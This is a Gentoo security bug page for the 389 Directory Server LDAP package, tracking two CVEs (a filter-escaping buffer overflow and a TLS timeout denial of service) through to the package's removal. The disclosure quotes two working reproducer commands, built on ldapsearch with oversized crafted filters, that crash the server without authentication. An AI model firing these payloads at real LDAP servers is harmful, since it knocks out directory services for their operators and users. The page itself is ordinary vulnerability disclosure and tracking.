Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 655176 (CVE-2018-1089, CVE-2019-3883) - net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883)
Summary: net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883)
Status: RESOLVED FIXED
Alias: CVE-2018-1089, CVE-2019-3883
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal trivial (vote)
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: ~3 [noglsa upstream/ebuild cve]
Keywords: PullRequest
Depends on: 731296
Blocks:
  Show dependency tree
 
Reported: 2018-05-07 15:53 UTC by Agostino Sarubbo
Modified: 2020-07-26 05:51 UTC (History)
5 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2018-05-07 15:53:08 UTC
From ${URL} :

This is to disclose the following flaw, CVE-2018-1089 :

389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/,
is a highly usable, fully featured, reliable and secure LDAP server
implementation. It handles many of the largest LDAP deployments in the
world.

389-ds server did not properly handle characters needed to be escaped in
its query filter. This could result in buffer overflows, from the heap
or the stack, on larger filters.  An unauthenticated attacker could send
a specially crafted LDAP request and crash the server. RCE has not been
demonstrated at this time.

Red Hat would like to thank Greg Kubok for alerting us of the issue.


Reproducer1 :
[root@server1 ~]# payload=$(printf '.*$%.0s' {1..1000})
[root@server1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah"
"(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(givenName=*${payload}*))(objectClass=posixaccount))"
"telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title
loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName
givenName nsAccountLock"

Reproducer2:
[root@server1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f-
"(&(uid=%s)(objectClass=posixaccount))"



@maintainer(s): since the package or the affected version has never been marked as stable, we don't need to stabilize it. After the bump, please remove the affected versions from the tree.
Comment 1 Jonas Stein gentoo-dev 2019-06-02 12:44:55 UTC
the package has no maintainer any more.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2020-04-16 23:09:22 UTC
CVE-2019-3883 (https://nvd.nist.gov/vuln/detail/CVE-2019-3883):
  In 389-ds-base up to version 1.4.1.2, requests are handled by workers
  threads. Each sockets will be waited by the worker for at most
  'ioblocktimeout' seconds. However this timeout applies only for un-encrypted
  requests. Connections using SSL/TLS are not taking this timeout into account
  during reads, and may hang longer.An unauthenticated attacker could
  repeatedly create hanging LDAP requests to hang all the workers, resulting
  in a Denial of Service.
Comment 3 Larry the Git Cow gentoo-dev 2020-06-04 19:14:55 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=66a48ca5d52d4699c4ef38209dfcad8ebdd149aa

commit 66a48ca5d52d4699c4ef38209dfcad8ebdd149aa
Author:     Sam James (sam_c) <sam@cmpct.info>
AuthorDate: 2020-06-04 18:24:47 +0000
Commit:     Thomas Deutschmann <whissi@gentoo.org>
CommitDate: 2020-06-04 19:14:36 +0000

    net-nds/389-ds-base, dev-libs/389-adminutil: Last rites
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Sam James (sam_c) <sam@cmpct.info>
    Signed-off-by: Thomas Deutschmann <whissi@gentoo.org>

 profiles/package.mask | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
Comment 4 Larry the Git Cow gentoo-dev 2020-07-13 04:53:09 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7414f8c33bb75cd9a4f6a61040886852fcf2afe1

commit 7414f8c33bb75cd9a4f6a61040886852fcf2afe1
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:52:07 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:31 +0000

    dev-libs/svrcore: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/svrcore/Manifest                         |   2 -
 dev-libs/svrcore/files/svrcore-4.0.4-gentoo.patch | 100 ----------------------
 dev-libs/svrcore/files/svrcore-4.1-gentoo.patch   | 100 ----------------------
 dev-libs/svrcore/metadata.xml                     |   5 --
 dev-libs/svrcore/svrcore-4.0.4-r1.ebuild          |  40 ---------
 dev-libs/svrcore/svrcore-4.1.2.ebuild             |  35 --------
 profiles/package.mask                             |   6 --
 7 files changed, 288 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=aef3f76fb5607ea9fcecd97c192a0ab06d224737

commit aef3f76fb5607ea9fcecd97c192a0ab06d224737
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:51:55 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:27 +0000

    dev-libs/389-adminutil: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/389-adminutil/389-adminutil-1.1.15.ebuild | 46 ----------------------
 dev-libs/389-adminutil/Manifest                    |  1 -
 dev-libs/389-adminutil/metadata.xml                |  5 ---
 profiles/package.mask                              |  2 -
 4 files changed, 54 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=eb6602276b3003bcdafd619a28ac6f163f52fb30

commit eb6602276b3003bcdafd619a28ac6f163f52fb30
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:50:40 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:23 +0000

    net-nds/389-ds-base: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 net-nds/389-ds-base/389-ds-base-1.3.6.8-r1.ebuild  | 126 -------
 net-nds/389-ds-base/389-ds-base-9999.ebuild        | 133 --------
 net-nds/389-ds-base/Manifest                       |   1 -
 ...-base-1.3.6-backport-invalid-password-mig.patch | 376 ---------------------
 net-nds/389-ds-base/files/389-ds-snmp.initd        |  44 ---
 net-nds/389-ds-base/files/389-ds.initd-r1          |  90 -----
 net-nds/389-ds-base/metadata.xml                   |  23 --
 7 files changed, 793 deletions(-)
Comment 5 Sam James archtester gentoo-dev Security 2020-07-26 05:51:35 UTC
~ package so noglsa, closing.